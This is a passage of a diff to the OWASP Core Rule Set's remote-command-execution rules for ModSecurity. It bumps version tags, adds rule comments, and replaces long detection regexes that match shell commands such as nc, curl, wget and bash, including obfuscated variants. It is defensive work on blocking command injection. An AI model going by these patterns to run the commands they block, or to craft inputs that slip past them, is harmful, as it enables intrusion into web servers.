),<>\|]|ulimit)|r(?:ash[\s\x0b&\),<>\|]|on(?:[\s\x0b&\),<>\|]|tab))|s(?:cli[\s\x0b&\),<>\|]|plit|vtool)|u(?:psfilter|rl[\s\x0b&\),<>\|]))|d(?:(?:ash|i(?:alog|ff)|vips)[\s\x0b&\),<>\|]|hclient|m(?:esg[\s\x0b&\),<>\|]|idecode|setup)|o(?:(?:as|ne)[\s\x0b&\),<>\|]|cker[\s\x0b&\),\-<>\|]|sbox)|pkg[\s\x0b&\),\-<>\|])|e(?:2fsck|asy_install|(?:cho|fax|grep|macs|sac|val)[\s\x0b&\),<>\|]|n(?:d(?:if|sw)[\s\x0b&\),<>\|]|v-update)|x(?:(?:ec|p(?:and|(?:ec|or)t|r))[\s\x0b&\),<>\|]|iftool))|f(?:acter|d(?:(?:find|isk)[\s\x0b&\),<>\|]|u?mount)|(?:etch|grep|lock|unction)[\s\x0b&\),<>\|]|i(?:le(?:[\s\x0b&\),<>\|]|test)|(?:n(?:d|ger)|sh)[\s\x0b&\),<>\|])|o(?:ld[\s\x0b&\),<>\|]|reach)|ping[\s\x0b&\),6<>\|]|tp(?:stats|who))|g(?:(?:awk|core|i(?:mp|nsh)|z(?:cat|exe|ip))[\s\x0b&\),<>\|]|e(?:ni(?:e[\s\x0b&\),<>\|]|soimage)|t(?:cap|facl[\s\x0b&\),<>\|]))|hc(?:-[\s\x0b&\),<>\|]|i[\s\x0b&\),\-<>\|])|r(?:(?:cat|ep)[\s\x0b&\),<>\|]|oupmod)|tester|unzip)|h(?:(?:ash|i(?:ghlight|story))[\s\x0b&\),<>\|]|e(?:ad[\s\x0b&\),<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op[\s\x0b&\),<>\|]|passwd))|i(?:(?:conv|nstall)[\s\x0b&\),<>\|]|f(?:config|top[\s\x0b&\),<>\|])|onice|p(?:6?tables|config|p(?:eveprinter|find|tool))|spell)|j(?:(?:ava|exec)[\s\x0b&\),<>\|]|o(?:in[\s\x0b&\),<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\x0b&\),<>\|]|all)|nife[\s\x0b&\),<>\|]|sshell)|l(?:a(?:st(?:comm[\s\x0b&\),<>\|]|log(?:in)?)|tex[\s\x0b&\),<>\|])|dconfig|ess(?:echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|get)|o(?:(?:cate|ok)[\s\x0b&\),<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:(?:-F|cpu|hw|mod|of|pci|usb)[\s\x0b&\),<>\|]|b_release)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|ynx[\s\x0b&\),<>\|]|z(?:4c(?:[\s\x0b&\),<>\|]|at)|c(?:at|mp)[\s\x0b&\),<>\|]|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|dec|info)|ore)))|m(?:(?:a(?:il[qx]?|ke|wk)|utt)[\s\x0b&\),<>\|]|k(?:(?:dir|nod)[\s\x0b&\),<>\|]|fifo|temp)|locate|o(?:squitto|unt[\s\x0b&\),<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|admin|dump(?:slow)?|hotcopy|show))|n(?:(?:a(?:no|sm|wk)|ice|map|o(?:de|hup)|ping|roff)[\s\x0b&\),<>\|]|c(?:\.(?:openbsd|traditional)|at[\s\x0b&\),<>\|])|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|s(?:enter|lookup|tat[\s\x0b&\),<>\|]))|o(?:ctave[\s\x0b&\),<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg[\s\x0b&\),<>\|]))|p(?:a(?:(?:cman|rted|tch)[\s\x0b&\),<>\|]|s(?:swd|te[\s\x0b&\),<>\|]))|d(?:b(?:2mb|3[\s\x0b&\),\.<>\|])|f(?:la)?tex|ksh[\s\x0b&\),<>\|])|er(?:(?:f|ms)[\s\x0b&\),<>\|]|l(?:5?[\s\x0b&\),<>\|]|sh))|(?:(?:ft|gre)p|opd|u(?:ppet|shd))[\s\x0b&\),<>\|]|hp(?:-cgi|[57][\s\x0b&\),<>\|])|i(?:(?:co|gz|ng6?)[\s\x0b&\),<>\|]|dstat)|k(?:exec|g_?info|ill[\s\x0b&\),<>\|])|rint(?:env|f[\s\x0b&\),<>\|])|s(?:(?:ed|ql)[\s\x0b&\),<>\|]|ftp)|tar(?:[\s\x0b&\),<>\|]|diff|grep)|y(?:3?versions|thon(?:[23]|[^\s\x0b]{1,10}\b)))|r(?:(?:ak[eu]|bash|nano|oute|vi(?:ew|m))[\s\x0b&\),<>\|]|e(?:a(?:delf|lpath)|(?:(?:boo|dcarpe)t|name|p(?:eat|lace))[\s\x0b&\),<>\|]|stic)|l(?:ogin|wrap)|m(?:dir[\s\x0b&\),<>\|]|t-(?:dump|tar)|user)|pm(?:db[\s\x0b&\),<>\|]|(?:quer|verif)y)|sync(?:-ssl|[\s\x0b&\),<>\|])|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c[\s\x0b&\),<>\|])))|s(?:(?:ash|c(?:hed|r(?:een|ipt))|diff|(?:ft|na)p|l(?:eep|sh)|plit)[\s\x0b&\),<>\|]|e(?:(?:ndmail|rvice)[\s\x0b&\),<>\|]|t(?:arch|cap|env|facl[\s\x0b&\),<>\|]|sid))|h(?:\.distrib|u(?:f|tdown)[\s\x0b&\),<>\|])|mbclient|o(?:(?:ca|r)t[\s\x0b&\),<>\|]|elim)|qlite3|sh(?:-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass)|t(?:art-stop-daemon|dbuf|r(?:ace|ings[\s\x0b&\),<>\|]))|udo(?:-rs|[\s\x0b&\),<>_\|]|edit|replay)|vn(?:a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:ilf?[\s\x0b&\),<>\|]|sk(?:[\s\x0b&\),<>\|]|set))|c(?:l?sh[\s\x0b&\),<>\|]|p(?:dump|ing|traceroute))|elnet|(?:ftp|mux|ouch)[\s\x0b&\),<>\|]|ime(?:datectl|out[\s\x0b&\),<>\|])|r(?:a(?:ceroute6?|p[\s\x0b&\),<>\|])|off[\s\x0b&\),<>\|])|shark)|u(?:limit[\s\x0b&\),<>\|]|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)[\s\x0b&\),<>\|]|expand|l(?:ink[\s\x0b&\),<>\|]|z(?:4[\s\x0b&\),<>\|]|ma))|pigz|z(?:ip[\s\x0b&\),<>\|]|std))|p(?:2date[\s\x0b&\),<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:(?:[ep]w|gr|rsh)[\s\x0b&\),<>\|]|mdiff|sudo(?:-rs)?)|olatility[\s\x0b&\),<>\|])|w(?:(?:all|get)[\s\x0b&\),<>\|]|h(?:iptail[\s\x0b&\),<>\|]|o(?:ami|is[\s\x0b&\),<>\|]))|i(?:reshark|sh[\s\x0b&\),<>\|]))|x(?:(?:args|pad|term)[\s\x0b&\),<>\|]|e(?:latex|tex[\s\x0b&\),<>\|])|mo(?:dmap|re[\s\x0b&\),<>\|])|z(?:c(?:at|mp)[\s\x0b&\),<>\|]|d(?:ec[\s\x0b&\),<>\|]|iff)|[ef]?grep|less|more))|z(?:athura|(?:c(?:at|mp)|diff|grep|less|run)[\s\x0b&\),<>\|]|[ef]grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|mo(?:dload|re[\s\x0b&\),<>\|])|s(?:oelim|td(?:[\s\x0b&\),<>\|]|(?:ca|m)t|grep|less))|ypper))" \ "id:932235,\ phase:2,\ block,\ @@ -195,7 +199,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -228,7 +232,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFil tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -262,7 +266,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -306,7 +310,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \$(?:\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -353,7 +357,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:f tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -393,7 +397,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ~[\+\- tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -427,7 +431,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \{[0-9 tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -467,6 +471,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \{[0-9 # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -492,7 +498,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \{[0-9 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932250 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dg]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|[kz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))(?:[\s\x0b&\),<>\|]|$).*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 